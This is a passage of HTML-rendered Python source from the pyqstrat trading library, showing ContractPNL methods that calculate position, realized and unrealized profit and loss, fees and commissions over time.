class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">])</span>\n <span class=\"n\">fee_chg</span> <span class=\"o\">=</span> <span class=\"nb\">sum</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">fee</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">])</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">position_chg</span><span class=\"p\">,</span> <span class=\"n\">realized_chg</span><span class=\"p\">,</span> <span class=\"n\">fee_chg</span><span class=\"p\">,</span> <span class=\"n\">commission_chg</span><span 
class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">prev_timestamp</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">prev_position</span><span class=\"p\">,</span> <span class=\"n\">prev_realized</span><span class=\"p\">,</span> <span class=\"n\">prev_fee</span><span class=\"p\">,</span> <span class=\"n\">prev_commission</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">prev_position</span> <span class=\"o\">+</span> <span class=\"n\">position_chg</span><span class=\"p\">,</span> <span class=\"n\">prev_realized</span> <span class=\"o\">+</span> <span class=\"n\">realized_chg</span><span class=\"p\">,</span>\n <span class=\"n\">prev_fee</span> <span class=\"o\">+</span> <span class=\"n\">fee_chg</span><span class=\"p\">,</span> <span class=\"n\">prev_commission</span> <span class=\"o\">+</span> <span class=\"n\">commission_chg</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_net_pnl</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.calc_net_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.calc_net_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">calc_net_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"c1\"># If we already calculated unrealized pnl for this timestamp and no new trades were added no need to do anything</span>\n <span class=\"k\">if</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span> <span class=\"ow\">and</span> <span class=\"ow\">not</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"ow\">or</span> <span class=\"n\">timestamp</span> <span class=\"o\">&lt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span><span class=\"p\">:</span> <span 
class=\"k\">return</span>\n <span class=\"c1\"># TODO: Option expiry should be a special case. If option expires at 3:00 pm, we put in an expiry order at 3 pm and the</span>\n <span class=\"c1\"># trade comes in at 3:01 pm. In this case, the final pnl is recorded at 3:01 but should be at 3 pm.</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span> <span class=\"ow\">and</span> <span class=\"n\">timestamp</span> <span class=\"o\">&gt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">and</span> <span class=\"ow\">not</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span><span class=\"p\">):</span> <span class=\"k\">return</span>\n \n <span class=\"c1\"># make sure timestamp is in the sequence of timestamps we were given </span>\n <span class=\"n\">i</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">timestamp</span><span class=\"p\">,</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;timestamp </span><span class=\"si\">{</span><span class=\"n\">timestamp</span><span class=\"si\">}</span><span class=\"s1\"> not found&#39;</span><span class=\"p\">)</span>\n\n <span class=\"c1\"># Find most current trade PNL, i.e. with the index before or equal to current timestamp. 
If not found, set to 0&#39;s</span>\n <span class=\"n\">trade_pnl_index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">trade_pnl_index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">trade_pnl_index</span><span class=\"p\">)</span>\n\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nan</span>\n\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isclose</span><span class=\"p\">(</span><span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">):</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"mf\">0.0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">,</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span><span class=\"p\">)</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"nb\">bool</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isreal</span><span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">)),</span>\n <span class=\"sa\">f</span><span class=\"s1\">&#39;Unexpected price type: </span><span 
class=\"si\">{</span><span class=\"n\">price</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"nb\">type</span><span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">)</span><span class=\"si\">}</span><span class=\"s1\"> for contract: </span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"si\">}</span><span class=\"s1\"> timestamp: </span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">):</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span> <span class=\"c1\"># Most recent unrealized pnl</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">prev_unrealized</span><span class=\"p\">,</span> <span class=\"n\">prev_open_qty</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">prev_open_qty</span><span class=\"p\">,</span> <span class=\"n\">prev_unrealized</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"n\">prev_unrealized</span> <span class=\"o\">+</span> <span class=\"p\">(</span><span class=\"n\">open_qty</span> <span class=\"o\">-</span> <span class=\"n\">prev_open_qty</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">price</span> <span class=\"o\">-</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"n\">open_qty</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">price</span> <span class=\"o\">-</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span>\n \n <span 
class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">realized</span> <span class=\"o\">+</span> <span class=\"n\">unrealized</span> <span class=\"o\">-</span> <span class=\"n\">commission</span> <span class=\"o\">-</span> <span class=\"n\">fee</span>\n\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span> <span class=\"ow\">and</span> <span class=\"n\">timestamp</span> <span class=\"o\">&gt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span> <span class=\"o\">=</span> <span class=\"n\">net_pnl</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span> <span class=\"o\">=</span> <span class=\"kc\">False</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.position\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.position\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">position</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"mf\">0.</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n <span class=\"k\">return</span> <span class=\"n\">position</span></div>\n \n<div class=\"viewcode-block\" 
id=\"ContractPNL.net_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.net_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">net_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span> <span class=\"ow\">and</span> <span class=\"n\">timestamp</span> <span class=\"o\">&gt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">and</span> <span class=\"ow\">not</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span><span class=\"p\">):</span>\n <span class=\"k\">return</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"mf\">0.</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n <span class=\"k\">return</span> <span class=\"n\">net_pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span 
class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">]:</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">!=</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n \n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">!=</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">open_position</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n <span class=\"k\">return</span> <span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span 
class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.df\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.df\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns a pandas dataframe with pnl data&#39;&#39;&#39;</span>\n <span class=\"n\">df_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([</span>\n <span class=\"p\">(</span><span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">3</span><span class=\"p\">])</span> <span class=\"k\">for</span> <span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">()],</span>\n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([</span>\n <span class=\"p\">(</span><span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">3</span><span class=\"p\">])</span> <span class=\"k\">for</span> <span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">()],</span>\n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span 
class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">concatenate</span><span class=\"p\">((</span><span class=\"n\">df_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">df_net_pnl</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">)))</span>\n <span class=\"n\">df_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">df_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">set_index</span><span class=\"p\">(</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reindex</span><span class=\"p\">(</span><span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">method</span><span class=\"o\">=</span><span class=\"s1\">&#39;ffill&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">()</span>\n <span class=\"n\">df_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">leading_nan_to_zero</span><span class=\"p\">(</span><span class=\"n\">df_trade_pnl</span><span class=\"p\">,</span> <span class=\"p\">[</span><span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">df_net_pnl</span><span class=\"o\">.</span><span class=\"n\">set_index</span><span class=\"p\">(</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reindex</span><span class=\"p\">(</span><span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">method</span><span class=\"o\">=</span><span class=\"s1\">&#39;ffill&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">()</span>\n <span class=\"k\">del</span> <span class=\"n\">df_net_pnl</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">]</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">concat</span><span class=\"p\">([</span><span class=\"n\">df_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">df_net_pnl</span><span class=\"p\">],</span> <span class=\"n\">axis</span><span class=\"o\">=</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"p\">[[</span><span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span 
